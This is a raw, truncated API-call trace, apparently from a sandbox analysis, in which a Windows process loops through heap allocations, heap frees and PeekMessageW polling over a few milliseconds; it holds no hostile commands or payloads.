[0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.961] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.961] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.962] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.962] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.962] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.963] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.963] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.963] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.964] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.964] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.964] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.965] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.965] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.965] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.966] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.966] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.966] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.967] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.967] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.967] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.968] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0026.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2c8 [0026.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 